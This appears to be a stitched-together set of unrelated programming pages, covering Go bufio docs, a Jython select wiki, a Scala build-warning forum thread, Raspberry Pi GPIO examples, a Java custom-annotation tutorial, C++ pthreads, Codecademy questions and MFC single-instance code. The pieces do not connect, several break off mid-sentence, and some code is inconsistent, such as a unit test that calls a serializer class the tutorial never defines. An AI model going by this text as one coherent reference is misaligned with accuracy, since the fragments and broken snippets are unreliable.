alert(smallCircle.getCircumference()); // displays 12.56
Here, we've encountered another way to define a function. We can use:
functionName = function([parameters]){
// function body
}
In this way, we can create parameters:
functionName = function(parameter1,parameter2,parameter3){
//function body
}
While functions aren't created this way very often, when we're creating objects, they can be useful shortcuts. These processes also help avoid conflicts with function names. For instance, another object can have a different function with the same name, for example
getArea(), without causing a conflict.
Updated on Jun 21, 16
Created on Apr 01, 08
Category: Computers & Internet
import "bufio"
Package bufio implements buffered I/O. It wraps an io.Reader or io.Writer object, creating another object (Reader or Writer) that also implements the interface but provides buffering and some help for textual I/O.
const (
    // MaxScanTokenSize is the maximum size used to buffer a token
    // unless the user provides an explicit buffer with Scanner.Buffer.
    MaxScanTokenSize = 64 * 1024
)

var (
    ErrTooLong         = errors.New("bufio.Scanner: token too long")
    ErrNegativeAdvance = errors.New("bufio.Scanner: SplitFunc returns negative advance count")
    ErrAdvanceTooFar   = errors.New("bufio.Scanner: SplitFunc returns advance count beyond input")
    ErrBadReadCount    = errors.New("bufio.Scanner: Read returned impossible count")
)
Errors returned by Scanner.
ScanBytes is a split function for a Scanner that returns each byte as a token.
ScanWords is a split function for a Scanner that returns each space-separated word of text, with surrounding spaces deleted. It will never return an empty string. The definition of space is set by unicode.IsSpace.
ReadWriter stores pointers to a Reader and a Writer. It implements io.ReadWriter.
func NewReadWriter(r *Reader, w *Writer) *ReadWriter
NewReadWriter allocates a new ReadWriter that dispatches to r and w.
Reader implements buffering for an io.Reader object.
NewReader returns a new Reader whose buffer has the default size.
NewReaderSize returns a new Reader whose buffer has at least the specified size. If the argument io.Reader is already a Reader with large enough size, it returns the underlying Reader.
Buffered returns the number of bytes that can be read from the current buffer.
Discard skips the next n bytes, returning the number of bytes discarded.
If Discard skips fewer than n bytes, it also returns an error. If 0 <= n <= b.Buffered(), Discard is guaranteed to succeed without reading from the underlying io.Reader.
Calling Peek prevents a UnreadByte or UnreadRune call from succeeding until the next read operation.
Read reads data into p. It returns the number of bytes read into p. The bytes are taken from at most one Read on the underlying Reader, hence n may be less than len(p). To read exactly len(p) bytes, use io.ReadFull(b, p). At EOF, the count will be zero and err will be io.EOF.
ReadByte reads and returns a single byte. If no byte is available, it returns an error. Calling UnreadByte after ReadLine will always unread the last byte read (possibly a character belonging to the line end) even if that byte is not part of the line returned by ReadLine.
ReadRune reads a single UTF-8 encoded Unicode character and returns the rune and its size in bytes. If the encoded rune is invalid, it consumes one byte and returns unicode.ReplacementChar (U+FFFD) with a size of 1.
Reset discards any buffered data, resets all state, and switches the buffered reader to read from r.
Size returns the size of the underlying buffer in bytes.
UnreadByte unreads the last byte. Only the most recently read byte can be unread.
UnreadByte returns an error if the most recent method called on the Reader was not a read operation. Notably, Peek is not considered a read operation.
UnreadRune unreads the last rune. If the most recent method called on the Reader was not a ReadRune, UnreadRune returns an error. (In this regard it is stricter than UnreadByte, which will unread the last byte from any read operation.)
WriteTo implements io.WriterTo. This may make multiple calls to the Read method of the underlying Reader. If the underlying reader supports the WriteTo method, this calls the underlying WriteTo without buffering.
Use a Scanner with a custom split function (built by wrapping ScanWords) to validate 32-bit decimal input.
Use a Scanner with a custom split function to parse a comma-separated list with an empty final value.
// Comma-separated list; last entry is empty.
const input = "1,2,3,4,"
scanner := bufio.NewScanner(strings.NewReader(input))
// Define a split function that separates on commas.
onComma := func(data []byte, atEOF bool) (advance int, token []byte, err error) {
	for i := 0; i < len(data); i++ {
		if data[i] == ',' {
			return i + 1, data[:i], nil
		}
	}
	if !atEOF {
		return 0, nil, nil
	}
	// There is one final token to be delivered, which may be the empty string.
	// Returning bufio.ErrFinalToken here tells Scan there are no more tokens after this
	// but does not trigger an error to be returned from Scan itself.
	return 0, data, bufio.ErrFinalToken
}
scanner.Split(onComma)
// Scan.
for scanner.Scan() {
	fmt.Printf("%q ", scanner.Text())
}
if err := scanner.Err(); err != nil {
	fmt.Fprintln(os.Stderr, "reading input:", err)
}
Output:
"1" "2" "3" "4" ""
The simplest use of a Scanner, to read standard input as a set of lines.
scanner := bufio.NewScanner(os.Stdin)
for scanner.Scan() {
	fmt.Println(scanner.Text()) // Println will add back the final '\n'
}
if err := scanner.Err(); err != nil {
	fmt.Fprintln(os.Stderr, "reading standard input:", err)
}
Use a Scanner to implement a simple word-count utility by scanning the input as a sequence of space-delimited tokens.
// An artificial input source.
const input = "Now is the winter of our discontent,\nMade glorious summer by this sun of York.\n"
scanner := bufio.NewScanner(strings.NewReader(input))
// Set the split function for the scanning operation.
scanner.Split(bufio.ScanWords)
// Count the words.
count := 0
for scanner.Scan() {
	count++
}
if err := scanner.Err(); err != nil {
	fmt.Fprintln(os.Stderr, "reading input:", err)
}
fmt.Printf("%d\n", count)
Output:
15
NewScanner returns a new Scanner to read from r. The split function defaults to ScanLines.
Bytes returns the most recent token generated by a call to Scan. The underlying array may point to data that will be overwritten by a subsequent call to Scan. It does no allocation.
Err returns the first non-EOF error that was encountered by the Scanner.
Split sets the split function for the Scanner. The default split function is ScanLines.
Split panics if it is called after scanning has started.
NewWriter returns a new Writer whose buffer has the default size.
NewWriterSize returns a new Writer whose buffer has at least the specified size. If the argument io.Writer is already a Writer with large enough size, it returns the underlying Writer.
Package bufio imports 5 packages and is imported by 86550 packages. Updated 2020-09-10.
URL: https://godoc.org/bufio
New Select Module
Contents
- New Select Module
- Introduction
- Usage notes
- Differences between cpython and jython
- Known Issues
Introduction
There is now select support in the jython distribution, as of version 2.2rc1.
The new module presents an API which is as close as possible to the cpython select module. Jython supports both the
- select.select function
- select.poll objects

When using the select module, you should be guided by the cpython documentation: any deviation from the behaviour described in that documentation, except for the considerations mentioned below, should be considered a bug and reported as such.

If you are starting a new project, it is recommended that you use select.poll objects, because

- Poll objects are the most efficient mechanism to multiplex sockets on jython, being fairly much a direct mapping to java.nio.channels.Selector objects.
- The select.select function is implemented using a poll object, which means that sockets are de/registered every single time, which is slightly less efficient.
Usage notes
Always close poll objects
When a socket has been registered with a select.poll object, it remains registered until explicitly deregistered. This has the following implications
- Sockets cannot be placed in blocking mode while they are still registered with poll objects
- The reference from the poll object to the socket might interfere with garbage collection
Therefore, it is recommended that you always explicitly close poll objects, using an idiom such as
def my_polling_func(sockets):
    poll_object = select.poll()
    try:
        for s in sockets:
            poll_object.register(s)
    finally:
        poll_object.close()
Closing a poll object cancels all registrations of sockets.
Differences between cpython and jython
Due to fundamental differences in the behaviour of java and C on various platforms, there are differences between the cpython and jython select modules which are not possible to code around. Those differences will be listed here.
Only sockets can be multiplexed, not files or any other IO channel. If you attempt to carry out a select operation on a file in jython, you will get a TypeError, like so
>>> from select import select
>>> import os
>>> fp = os.open("test.txt")
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: open() takes at least 2 arguments (1 given)
>>> fp = os.open("test.txt", os.O_WRONLY|os.O_CREAT)
>>> select([fp], [], [])
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "C:\jython\Lib\select.py", line 176, in native_select
    pobj.register(fd, POLLIN)
  File "C:\jython\Lib\select.py", line 95, in register
    channel = _getselectable(socket_object)
  File "C:\jython\Lib\select.py", line 56, in _getselectable
    raise TypeError("Object '%s' is not watchable" % selectable_object)
TypeError: ("Object 'org.python.core.io.FileIO@c4afc4' is not watchable", 39)

Because jython must respect this java restriction, any attempt in jython to pass a socket in blocking mode to either select.select or select.poll().register will fail with an exception.
To summarise
- You must set a socket in non-blocking mode before passing it to the select function or registering it with a poll object
- Any attempt to register a blocking socket for multiplex will raise a select.error exception, with an error code of errno.ESOCKISBLOCKING
- If a socket is currently registered with a select.poll object, an attempt to change it to blocking mode will give rise to the same exception.
A socket can only be placed in blocking mode if it is not registered with a select.poll object.
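The recommended pattern — set the socket non-blocking, register it, poll, then deregister — can be sketched as follows (shown with CPython's select and socket modules for illustration; the socketpair and the 1000 ms timeout are arbitrary choices):

```python
import select
import socket

# Sketch: a connected pair of sockets stands in for real network traffic.
a, b = socket.socketpair()
a.setblocking(False)            # mandatory on jython before registering

poll_object = select.poll()
poll_object.register(a, select.POLLIN)
try:
    b.send(b"ping")                       # make `a` readable
    events = poll_object.poll(1000)       # list of (fd, eventmask) pairs
    assert events and events[0][1] & select.POLLIN
    print(a.recv(4))                      # b'ping'
finally:
    poll_object.unregister(a)             # explicit deregistration
    a.close()
    b.close()
```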
This issue could be problematic if you want to use a cpython module which relies on select. Such cpython modules do not set their sockets in non-blocking mode before passing them to select.select. In order to support such cpython modules, the following workaround is available.
The cpython-compatible select function
A special version of the select function is provided, to provide cpython compatible select functionality. This function works by
- Recording the blocking mode of all sockets that are passed to the function
- Setting non-blocking mode on all sockets
- Calling the normal jython select.select function (which requires non-blocking sockets)
- Restoring the previously-saved blocking mode for all sockets
- Returning the results of the wrapped select function
This function should only be used when you are working with code that has been written for cpython select, i.e. when the code is passing blocking-sockets to the select function.
How to enable cpython compatible select processing
Here is a code sample which shows how to use the cpython-compatible select function as a replacement for the standard jython select function
from select import cpython_compatible_select as select

# Make use of the select function here
WARNING!
- If using the cpython_compatible_select function, you must be aware that the function will modify the blocking mode of your sockets for the duration of the call. If you are carrying out socket operations on that socket in another thread, then those socket operations may fail or raise exceptions.
This function will still not cover all possible uses of select.select by cpython modules. If a cpython module tries to multiplex the sys.stdin or sys.stdout streams, then registration of the channels will fail, because the InputStream and OutputStream representing sys.stdin and sys.stdout are not SelectableChannels.
Known Issues
Receiving urgent data can cause select to lie (Windows implementation)
Bug 1773955 describes the scenario. It is caused by a bug in the Sun Java implementation and there is no known Jython fix. A partial workaround is to call setOOBInline(True) on the jsocket within the Jython socket. This will cause the urgent data to be merged into the regular stream and will keep from confusing select() however you will have to ignore the urgent data at the application level.
Addendum: Support for socket options has been checked into the repo at revision 4494. See NewSocketModule for more details on the options available.
With the new support, you don't need to call the java API on the underlying socket; you can set the OOBINLINE flag using python syntax, like this
mysock.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
But there is still no workaround for the lack of support for TCP Urgent Data on java.
URL: https://wiki.python.org/jython/SelectModule?action=diff&rev1=5&rev2=10
Hi,
In projects containing both Java and Scala files, it's possible to get no warnings on a full rebuild, yet get Java-related deprecation warnings when building incrementally. It's especially problematic when one uses -Xfatal-warnings.
The minimal reproduction:
1. Create two files.
J.java
public class J {
@Deprecated
public static void foo() {}
}
S.scala
class S {
J.foo()
}
2. Make project (for the first time) or Rebuild Project. Everything is okay and the Messages view is not even shown.
3. Now add some blank line in S.scala and start build:
Warning (or obviously Error in case of -Xfatal-warnings):

scalac: there was one deprecation warning; re-run with -deprecation for details
4. Then Rebuild Project and, again, there are no warnings.
Currently I use IntelliJ 15.0.2 with Scala plugin 2.0.4 but I saw this previously also with IntelliJ 14.
Just in case - having "Enable warnings" unchecked or explicit -deprecation:false is a workaround but it's not a solution. Also sometimes it's not so simple to just get rid of deprecated code (or it's the responsibility of someone else).
Probably I could just create an issue in your issue tracker, but anyway I'd like to understand what you do differently when running a full build versus building incrementally. For instance, in case of gradle's build from cmd with -Xfatal-warnings enabled, it was never failing - no matter whether building from scratch or incrementally.
Cheers,
Michał
Ah, ok. It looks like it's not IntelliJ-specific but rather something with scalac/sbt. As I checked, the behaviour is exactly the same in case of sbt build from cmd (unlike with gradle) and Scala IDE.
Cheers,
Michał
Yes, it seems that scalac emits deprecation warnings if deprecated members are from the classpath. If the class is compiled in the same compilation run, there are no such warnings.
URL: https://intellij-support.jetbrains.com/hc/en-us/community/posts/206632705-Different-behaviours-when-running-a-full-rebuild-and-building-incrementally
Difference between revisions of "RPi Low-level peripherals"
Revision as of 19:22, 20 June

The R-Pi offers lower-level interfaces intended to connect more directly with chips and subsystem modules. These GPIO (general purpose I/O) signals on the 2x13 header pins include SPI, I²C, serial UART, 3V3 and 5V power. These interfaces are not "plug and play" and require care to avoid miswiring. The pins use a 3V3 logic level and are not tolerant of 5V levels, such as you might find on a 5V powered Arduino. CSI (camera serial interface) can be used to connect the available 5 MP camera. Not yet software-enabled are the flex cable connectors with DSI (display serial interface) and a serial link inside the HDMI connector called CEC (consumer electronics control).
General Purpose Input/Output [1]

A GPIO example using the sysfs interface:

/*
 * Raspberry Pi GPIO example using sysfs interface.
 * Guillermo A. Amaral B. <g@maral.me>
 *
 * This file blinks GPIO 4 (P1-07) while reading GPIO 24 (P1_18).
 */
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define IN  0
#define OUT 1

#define LOW  0
#define HIGH 1

#define PIN  24 /* P1-18 */
#define POUT 4  /* P1-07 */
bcm2835
This must be done as root. To change to the root user:
sudo -i
You must also get and install the bcm2835 library, which supports GPIO and SPI interfaces. Details and downloads from
// blink.c
//
// Example program for bcm2835 library
// Blinks a pin on and off every 0.5 secs
//
// After installing bcm2835, you can build this
// with something like:
// gcc -o blink -l rt blink.c -l bcm2835
// sudo ./blink
//
// Or you can test it before installing with:
// gcc -o blink -l rt -I ../../src ../../src/bcm2835.c blink.c
// sudo ./blink
//
// Author: Mike McCauley (mikem@open.com.au)
// Copyright (C) 2011 Mike McCauley
// $Id: RF22.h,v 1.21 2012/05/30 01:51:25 mikem Exp $

#include <bcm2835.h>

// Blinks on RPi pin GPIO 11
#define PIN RPI_GPIO_P1_11

int main(int argc, char **argv)
{
    // If you call this, it will not actually access the GPIO
    // Use for testing
    // bcm2835_set_debug(1);

    if (!bcm2835_init())
        return 1;

    // Set the pin to be an output
    bcm2835_gpio_fsel(PIN, BCM2835_GPIO_FSEL_OUTP);

    // Blink
    while (1)
    {
        // Turn it on
        bcm2835_gpio_write(PIN, HIGH);

        // wait a bit
        delay(500);

        // turn it off
        bcm2835_gpio_write(PIN, LOW);

        // wait a bit
        delay(500);
    }
    return 0;
}
Perl
This must be done as root. To change to the root user:
sudo su -
Supports GPIO and SPI interfaces. You must also get and install the bcm2835 library. Details and downloads from You must then get and install the Device::BCM2835 perl library from CPAN
use Device::BCM2835;
use strict;

# call set_debug(1) to do a non-destructive test on non-RPi hardware
#Device::BCM2835::set_debug(1);
Device::BCM2835::init() || die "Could not init library";

# Blink pin 11:
# Set RPi pin 11 to be an output
Device::BCM2835::gpio_fsel(&Device::BCM2835::RPI_GPIO_P1_11,
                           &Device::BCM2835::BCM2835_GPIO_FSEL_OUTP);
while (1)
{
    # Turn it on
    Device::BCM2835::gpio_write(&Device::BCM2835::RPI_GPIO_P1_11, 1);
    Device::BCM2835::delay(500); # Milliseconds

    # Turn it off
    Device::BCM2835::gpio_write(&Device::BCM2835::RPI_GPIO_P1_11, 0);
    Device::BCM2835::delay(500); # Milliseconds
}
Python
RPi.GPIO
The RPi.GPIO module is installed by default in Raspbian. Any RPi.GPIO script must be run as root.
import RPi.GPIO as GPIO

# use P1 header pin numbering convention
GPIO.setmode(GPIO.BOARD)

# Set up the GPIO channels - one input and one output
GPIO.setup(11, GPIO.IN)
GPIO.setup(12, GPIO.OUT)

# Input from pin 11
input_value = GPIO.input(11)

# Output to pin 12
GPIO.output(12, GPIO.HIGH)

# The same script as above but using BCM GPIO 00..nn numbers
GPIO.setmode(GPIO.BCM)
GPIO.setup(17, GPIO.IN)
GPIO.setup(18, GPIO.OUT)
input_value = GPIO.input(17)
GPIO.output(18, GPIO.HIGH)
Scratch can be used to control the GPIO pins using a background Python handler available from
Pridopia Scratch Rs-Pi-GPIO driver
Scratch control of GPIO (use the GPIO number, not the P1 pin number; can support GPIO 28, 29, 30, 31)
This uses the Java library available at. It does not depend on (or use) the wiringPi driver, but uses the same numbering scheme. Instead it uses the default driver under /sys/class/gpio that ships with the distro, so it works out of the box. Any Java application that controls GPIO must be run as root.
Export creates a new folder for the exported pin, and creates files for each of its control functions (i.e. active_low, direction, edge, power, subsystem, uevent, and value). Upon creation, the control files can be read by all users (not just root), but can only be written to by user root, the file's owner. Nevertheless, once created, it is possible to allow users other than root, to also write inputs to the control files, by changing the ownership or permissions of these files. Changes to the file's ownership or permissions must initially be done as root, as their owner and group is set to root upon creation. Typically you might change the owner to be the (non root) user controlling the GPIO, or you might add write permission, and change the group ownership to one of which the user controlling the GPIO is a member. By such means, using only packages provided in the recommended rasbian distribution, it is possible for Python CGI scripts, which are typically run as user nobody, to be used for control of the GPIO over the internet from a browser at a remote location.
#!/bin/sh

# GPIO numbers should be from this list
# 0, 1, 4, 7, 8, 9, 10, 11, 14, 15, 17, 18, 21, 22, 23, 24, 25

# Note that the GPIO numbers that you program here refer to the pins
# of the BCM2835 and *not* the numbers on the pin header.
# So, if you want to activate GPIO7 on the header you should be
# using GPIO4 in this script. Likewise if you want to activate GPIO0
# on the header you should be using GPIO17 here.
wiringPi - gpio utility
You need the wiringPi library from. Once installed, there is a new command gpio which can be used as a non-root user to control the GPIO pins.
The man page
man gpio
has
Whilst bwbasic can accommodate shell commands, and we can store a set of these commands (eg. to export a number of GPIO pins at the outset) as numbered statements in a file that can be loaded with the basic command LOAD "filename" and RUN (ref 2), the shell commands have to run as a separate file, as they cannot be run from within, as part of a basic:
SPI
There is
URL: https://elinux.org/index.php?title=RPi_Low-level_peripherals&diff=382861
Creating a Custom Annotation in Java
Last modified: December 14, 2019
1. Introduction
Java annotations are a mechanism for adding metadata information to our source code. They are a powerful part of Java, and were added in JDK5. Annotations offer an alternative to the use of XML descriptors and marker interfaces.
Although we can attach them to packages, classes, interfaces, methods, and fields, annotations by themselves have no effect on the execution of a program.
In this tutorial, we're going to focus on how to create custom annotations, and how to process them. We can read more about annotations in our article on annotation basics.
2. Creating Custom Annotations
We're going to create three custom annotations with the goal of serializing an object into a JSON string.
We'll use the first one on the class level, to indicate to the compiler that our object can be serialized. Next, we'll apply the second one to the fields that we want to include in the JSON string.
Finally, we'll use the third annotation on the method level, to specify the method that we'll use to initialize our object.
2.1. Class Level Annotation Example
The first step toward creating a custom annotation is to declare it using the @interface keyword:
public @interface JsonSerializable { }
The next step is to add meta-annotations to specify the scope and the target of our custom annotation:
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.TYPE)
public @interface JsonSerializable {
}
As we can see, our first annotation has runtime visibility, and we can apply it to types (classes). Moreover, it has no methods, and thus serves as a simple marker to mark classes that can be serialized into JSON.
2.2. Field Level Annotation Example
In the same fashion, we create our second annotation, to mark the fields that we are going to include in the generated JSON:
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.FIELD)
public @interface JsonElement {
    public String key() default "";
}
The annotation declares one String parameter with the name “key” and an empty string as the default value.
When creating custom annotations with methods, we should be aware that these methods must have no parameters, and cannot throw an exception. Also, the return types are restricted to primitives, String, Class, enums, annotations, and arrays of these types, and the default value cannot be null.
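As a sketch of these rules (the Column annotation below is hypothetical, not part of the article's example), an annotation can mix primitive, String, Class, enum, and array members, each with a non-null default:

```java
import java.lang.annotation.*;

// Hypothetical annotation illustrating the allowed member types:
// a String, a primitive, a Class, and an array - each with a default.
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.FIELD)
@interface Column {
    String name() default "";
    int length() default 255;
    Class<?> type() default String.class;
    ElementType[] appliesTo() default {};
}

public class Demo {

    @Column(name = "age", length = 3)
    int age;

    public static void main(String[] args) throws Exception {
        // Read the members back via reflection at runtime.
        Column c = Demo.class.getDeclaredField("age").getAnnotation(Column.class);
        System.out.println(c.name() + ":" + c.length()); // prints age:3
    }
}
```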
2.3. Method Level Annotation Example
Let's imagine that, before serializing an object to a JSON string, we want to execute some method to initialize an object. For that reason, we're going to create an annotation to mark this method:
@Retention(RetentionPolicy.RUNTIME)
@Target(ElementType.METHOD)
public @interface Init {
}
We declared a public annotation with runtime visibility that we can apply to our classes' methods.
2.4. Applying Annotations
Now, let's see how we can use our custom annotations. For instance, let's imagine that we have an object of type Person that we want to serialize into a JSON string. This type has a method that capitalizes the first letter of the first and last names. We'll want to call this method before serializing the object:
@JsonSerializable
public class Person {

    @JsonElement
    private String firstName;

    @JsonElement
    private String lastName;

    @JsonElement(key = "personAge")
    private String age;

    private String address;

    @Init
    private void initNames() {
        this.firstName = this.firstName.substring(0, 1).toUpperCase()
          + this.firstName.substring(1);
        this.lastName = this.lastName.substring(0, 1).toUpperCase()
          + this.lastName.substring(1);
    }

    // Standard getters and setters
}
By using our custom annotations, we're indicating that we can serialize a Person object to a JSON string. In addition, the output should contain only the firstName, lastName, and age fields of that object. Moreover, we want the initNames() method to be called before serialization.
By setting the key parameter of the @JsonElement annotation to “personAge”, we are indicating that we'll use this name as the identifier for the field in the JSON output.
For the sake of demonstration, we made initNames() private, so we can't initialize our object by calling it manually, and our constructors aren't using it either.
3. Processing Annotations
So far, we have seen how to create custom annotations and how to use them to decorate the Person class. Now, we're going to see how to take advantage of them by using Java's Reflection API.
The first step will be to check whether our object is null or not, as well as whether its type has the @JsonSerializable annotation or not:
private void checkIfSerializable(Object object) {
    if (Objects.isNull(object)) {
        throw new JsonSerializationException("The object to serialize is null");
    }
    Class<?> clazz = object.getClass();
    if (!clazz.isAnnotationPresent(JsonSerializable.class)) {
        throw new JsonSerializationException("The class "
          + clazz.getSimpleName()
          + " is not annotated with JsonSerializable");
    }
}
Then, we look for any method with @Init annotation, and we execute it to initialize our object's fields:
private void initializeObject(Object object) throws Exception {
    Class<?> clazz = object.getClass();
    for (Method method : clazz.getDeclaredMethods()) {
        if (method.isAnnotationPresent(Init.class)) {
            method.setAccessible(true);
            method.invoke(object);
        }
    }
}
The call of method.setAccessible(true) allows us to execute the private initNames() method.
After the initialization, we iterate over our object's fields, retrieve the key and value of JSON elements, and put them in a map. Then, we create the JSON string from the map:
private String getJsonString(Object object) throws Exception {
    Class<?> clazz = object.getClass();
    Map<String, String> jsonElementsMap = new HashMap<>();
    for (Field field : clazz.getDeclaredFields()) {
        field.setAccessible(true);
        if (field.isAnnotationPresent(JsonElement.class)) {
            jsonElementsMap.put(getKey(field), (String) field.get(object));
        }
    }
    String jsonString = jsonElementsMap.entrySet()
        .stream()
        .map(entry -> "\"" + entry.getKey() + "\":\"" + entry.getValue() + "\"")
        .collect(Collectors.joining(","));
    return "{" + jsonString + "}";
}
Again, we used field.setAccessible(true) because the Person object's fields are private.
Our JSON serializer class combines all the above steps:
public class ObjectToJsonConverter {
    public String convertToJson(Object object) throws JsonSerializationException {
        try {
            checkIfSerializable(object);
            initializeObject(object);
            return getJsonString(object);
        } catch (Exception e) {
            throw new JsonSerializationException(e.getMessage());
        }
    }
}
Finally, we run a unit test to validate that our object was serialized as defined by our custom annotations:
@Test
public void givenObjectSerializedThenTrueReturned() throws JsonSerializationException {
    Person person = new Person("soufiane", "cheouati", "34");
    JsonSerializer serializer = new JsonSerializer();
    String jsonString = serializer.serialize(person);
    assertEquals(
      "{\"personAge\":\"34\",\"firstName\":\"Soufiane\",\"lastName\":\"Cheouati\"}",
      jsonString);
}
4. Conclusion
In this article, we saw how to create different types of custom annotations. Then we discussed how to use them to decorate our objects. Finally, we looked at how to process them using Java's Reflection API.
As always, the complete code is available over on GitHub.
In person class
@Init
private void initNames()
but later discussion
we made initializeNames() private
Thanks Ron! Fixed.
Hi. Thanks for this tutorial! It looks like the ObjectToJsonConverter class was renamed to JsonSerializer in the unit test.
It looks like the JsonSerializerUnitTest class has tests for the ObjectToJsonConverter class.
ObjectToJsonConverter:
JsonSerializerUnitTest:
please share the definition of getKey(field) method.
URL: https://www.baeldung.com/java-custom-annotation
In this C++ tutorial, let us discuss multithreading concepts and the creation and termination of threads, with an example program.
Introduction of Multithreading
Multithreading is a specific form of multitasking that allows your computer to run two or more programs concurrently. There are two types of multitasking:
- process-based multitasking
- thread-based multitasking
Process-based multitasking controls the concurrent execution of programs, whereas thread-based multitasking deals with the concurrent execution of parts of the same program.

In general, C++ (prior to the C++11 standard) does not provide any built-in support for multithreaded applications. Instead, it relies entirely upon the operating system to provide that feature.
Creation of Thread
The routine given below is used to create a POSIX thread.
#include <pthread.h> pthread_create (thread, attr, start_routine, arg)
Here, pthread_create creates a new thread and makes it executable. This routine can be called several numbers of times from anywhere within the code.
Description of parameters in the above-specified routine
- thread
An opaque, unique identifier for the new thread returned by the subroutine.
- attr
An opaque attribute object that may be used to set thread attributes. You can specify a thread attributes object or NULL for the default values.
- start_routine
The C++ routine that the thread will execute once it is created.
- arg
A single argument that may be passed to start_routine. It must be passed by reference as a pointer cast of type void. NULL may be used if no argument is to be passed.
Termination of Threads
The routine given below is used to terminate a POSIX thread
#include <pthread.h>

pthread_exit (status)
Here pthread_exit is used to explicitly exit a thread. Typically, the pthread_exit() routine is called after a thread has completed its work and is no longer required to exist.
C++ Program for creation and termination of threads
This following example code creates 5 threads with the pthread_create() routine and then terminates it using pthread_exit().
#include <iostream>
#include <cstdlib>
#include <pthread.h>

using namespace std;

#define NUM_THREADS 5

void *PrintHello(void *threadid) {
    long tid;
    tid = (long)threadid;
    cout << "Hello World! Thread ID, " << tid << endl;
    pthread_exit(NULL);
}

int main () {
    pthread_t threads[NUM_THREADS];
    int rc;
    int i;

    for( i = 0; i < NUM_THREADS; i++ ) {
        cout << "main() : creating thread, " << i << endl;
        rc = pthread_create(&threads[i], NULL, PrintHello, (void *)i);

        if (rc) {
            cout << "Error:unable to create thread," << rc << endl;
            exit(-1);
        }
    }
    pthread_exit(NULL);
}
Output
main() : creating thread, 0
main() : creating thread, 1
main() : creating thread, 2
main() : creating thread, 3
main() : creating thread, 4
Hello World! Thread ID, 0
Hello World! Thread ID, 1
Hello World! Thread ID, 2
Hello World! Thread ID, 3
Hello World! Thread ID, 4
URL: https://www.codeatglance.com/cpp-multithreading/
First of all, I’d like to apologize if there is any issue with my question.
I don’t really understand why my code is printing out the correct position.
When I call Console.WriteLine($"Song number {index} is rated three stars"); shouldn't the code need {position} instead of {index}?
I don't understand why index has 1 added to it…
using System;

namespace BuiltInMethods
{
    class Program
    {
        static void Main(string[] args)
        {
            string[] summerStrut;
            summerStrut = new string[] { "Juice", "Missing U", "Raspberry Beret", "New York Groove", "Make Me Feel", "Rebel Rebel", "Despacito", "Los Angeles" };
            int[] ratings = { 5, 4, 4, 3, 3, 5, 5, 4 };
            int index = (Array.IndexOf(ratings, 3));
            int position = index++;
            int threeStars = Array.Find(ratings, three => three == 3);
            Console.WriteLine($"Song number {index} is rated three stars");
        }
    }
}
Hi guys, I solved these two problems myself without googling.
I have little confusion on nested loops here:
1st code:
def exponents(bases, powers):
  new_list = []
  for i in range(len(bases)):
    for j in range(len(powers)):
      new_list.append(bases[i] ** powers[j])
  return new_list

print(exponents([2,3,4],[1,2,3]))
2nd code:
def larger_sum(lst1, lst2):
  sum1 = 0
  sum2 = 0
  for i in range(len(lst1)):
    sum1 += lst1[i]
  for j in range(len(lst2)):
    sum2 += lst2[j]
  if sum1 > sum2:
    return lst1
  elif sum1 == sum2:
    return lst1
  else:
    return lst2

print(larger_sum([1, 9, 5], [2, 3, 7]))
In the second code, I was not getting the solution when I used nested loops. My doubt is this: the second code also takes two list parameters, so why don't we use a nested loop there, while in the first code we do use one (since each base must be raised to each power)?
Somebody, please clear my doubts.
I will be very thankful to you.
Thanks
New coder | https://discuss.codecademy.com/t/nested-loop-confusion/491566 | CC-MAIN-2020-40 | en | refinedweb |
13.2. Application Specific Questions
13.2.1. How can I create an application that is initially maximized?
For new applications, this can be done with AppWizard during Step 4. During Step 4, choose Advanced..., and then select the Main Frame tab. Check the Maximized option.
For an MDI application, in the CWinApp::InitInstance() function, set CWinApp::m_nCmdShow to SW_SHOWMAXIMIZED before calling pMainFrame->ShowWindow(m_nCmdShow). In an application generated by AppWizard, the code is as follows:
CMainFrame* pMainFrame = new CMainFrame;
if (!pMainFrame->LoadFrame(IDR_MAINFRAME))
return FALSE;
m_nCmdShow = SW_SHOWMAXIMIZED; // ADD THIS LINE!
pMainFrame->ShowWindow(m_nCmdShow);
pMainFrame->UpdateWindow();
m_pMainWnd = pMainFrame;
In an SDI application, in the CWinApp::InitInstance() function, set CWinApp::m_nCmdShow to SW_SHOWMAXIMIZED before calling OnFileNew(). For example, in an application generated by AppWizard, the code is as follows:
m_nCmdShow = SW_SHOWMAXIMIZED;

// create a new (empty) document
OnFileNew();
MSVC Knowledge Base, 6/4/95
13.2.2. How do I limit my MFC application to one instance?
Look at the Microsoft sample ONETIME.EXE, (MSDN CD or). In Brief:
const char* MyMainWndClassName = "MyMainWndXQW";

BOOL CMyApp::InitApplication()
{
    // Call base class. Default version does nothing.
    CWinApp::InitApplication();

    WNDCLASS wndcls;

    // start with NULL defaults
    memset(&wndcls, 0, sizeof(WNDCLASS));

    // Get class information for default window class.
    ::GetClassInfo(AfxGetInstanceHandle(), "AfxFrameOrView", &wndcls);

    // Substitute unique class name for new class
    wndcls.lpszClassName = MyMainWndClassName;

    // Register new class and return the result code
    return ::RegisterClass(&wndcls);
}
BOOL CMyApp::FirstInstance()
{
    CWnd *PrevCWnd, *ChildCWnd;

    // Determine if another window with our class name exists...
    PrevCWnd = CWnd::FindWindow(MyMainWndClassName, NULL);
    if (PrevCWnd != NULL)
    {
        // if so, does it have any popups?
        ChildCWnd = PrevCWnd->GetLastActivePopup();
        // Bring the main window to the top
        PrevCWnd->BringWindowToTop();
        // If iconic, restore the main window
        if (PrevCWnd->IsIconic())
            PrevCWnd->ShowWindow(SW_RESTORE);
        // If there are popups, bring them along too!
        if (PrevCWnd != ChildCWnd)
            ChildCWnd->BringWindowToTop();
        // Return FALSE. This isn't the first instance
        // and we are done activating the previous one.
        return FALSE;
    }
    else
        // First instance. Proceed as normal.
        return TRUE;
}
BOOL CMyApp::InitInstance()
{
    if (!FirstInstance())
        return FALSE;
    //...
}
Niels Ull Jacobsen ([email protected]), programmer.tools, 6/19/95
